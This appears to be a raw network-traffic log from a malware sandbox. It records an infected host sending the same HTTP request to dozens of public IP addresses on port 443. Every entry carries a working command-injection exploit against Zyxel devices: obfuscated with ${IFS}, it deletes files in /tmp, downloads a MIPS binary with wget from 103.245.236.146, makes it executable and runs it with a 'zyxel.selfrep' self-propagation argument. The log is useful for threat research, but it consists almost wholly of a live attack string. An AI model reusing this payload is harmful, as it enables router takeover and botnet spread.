                                                Jan 28, 2024 10:16:26.830164909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4713192.168.2.2342322177.253.51.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830183029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4714192.168.2.2339484109.192.102.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830231905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4715192.168.2.2332824117.208.190.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830250978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4716192.168.2.2347116192.59.38.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830291986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4717192.168.2.2348968164.81.36.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830308914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4718192.168.2.2345174161.199.158.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830344915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4719192.168.2.235068684.0.26.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830363035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4720192.168.2.234564213.227.33.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830399036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4721192.168.2.2336614201.172.146.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830440044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4722192.168.2.2358938148.129.54.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830465078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4723192.168.2.235237025.225.79.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830507040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4724192.168.2.2347766159.124.66.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830542088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4725192.168.2.2355280174.34.178.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830569029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4726192.168.2.234035850.95.183.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830589056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4727192.168.2.233638276.18.130.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830622911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4728192.168.2.2344210106.49.91.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830668926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4729192.168.2.2352196178.22.179.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830686092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4730192.168.2.233814891.34.55.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830717087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4731192.168.2.2344900118.59.174.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830770016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4732192.168.2.2336494118.77.69.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830790043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4733192.168.2.2346156123.184.95.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830805063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4734192.168.2.2333178102.142.232.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830846071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4735192.168.2.23560662.139.160.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830868006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4736192.168.2.235585467.212.117.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830885887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4737192.168.2.2335578167.121.242.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830924034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4738192.168.2.233722448.131.24.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830945969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4739192.168.2.2340272207.128.43.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.830961943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4740192.168.2.2350708189.163.84.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831008911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4741192.168.2.235369474.179.216.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831039906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4742192.168.2.236077280.141.179.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831068993 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4743192.168.2.2343376206.121.171.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831101894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4744192.168.2.235497469.191.112.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831120968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4745192.168.2.235666681.6.165.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831166029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4746192.168.2.2349312172.246.181.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831182957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4747192.168.2.2349182171.188.102.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831217051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4748192.168.2.235062627.122.187.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831226110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4749192.168.2.235901890.5.137.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831259966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4750192.168.2.2333078187.174.203.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831300974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4751192.168.2.2332970149.15.32.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831317902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4752192.168.2.2348982109.100.85.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831346989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4753192.168.2.235957240.222.174.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831365108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4754192.168.2.233517257.138.82.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831396103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4755192.168.2.23466069.242.67.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831404924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4756192.168.2.235804494.126.183.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831439972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4757192.168.2.2345532146.165.89.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831470013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4758192.168.2.2338766122.99.191.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831507921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4759192.168.2.2348874221.127.86.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831540108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4760192.168.2.2348586223.123.202.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831542015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4761192.168.2.233848679.138.245.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831558943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4762192.168.2.2332932218.121.223.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831594944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4763192.168.2.2335632223.254.33.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831629992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4764192.168.2.2345790136.160.92.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831682920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4765192.168.2.2336878129.2.119.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831721067 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4766192.168.2.2342498128.217.4.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831753016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4767192.168.2.2334972178.250.53.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831774950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4768192.168.2.2357748137.18.214.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831778049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4769192.168.2.233458065.87.161.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831804991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4770192.168.2.2334368170.111.79.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831846952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4771192.168.2.2333772145.97.81.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831882954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4772192.168.2.23352961.89.242.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831902981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4773192.168.2.2353678205.199.253.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:26.831923008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4774192.168.2.2352008191.160.67.210443
                                                TimestampBytes transferredDirectionData
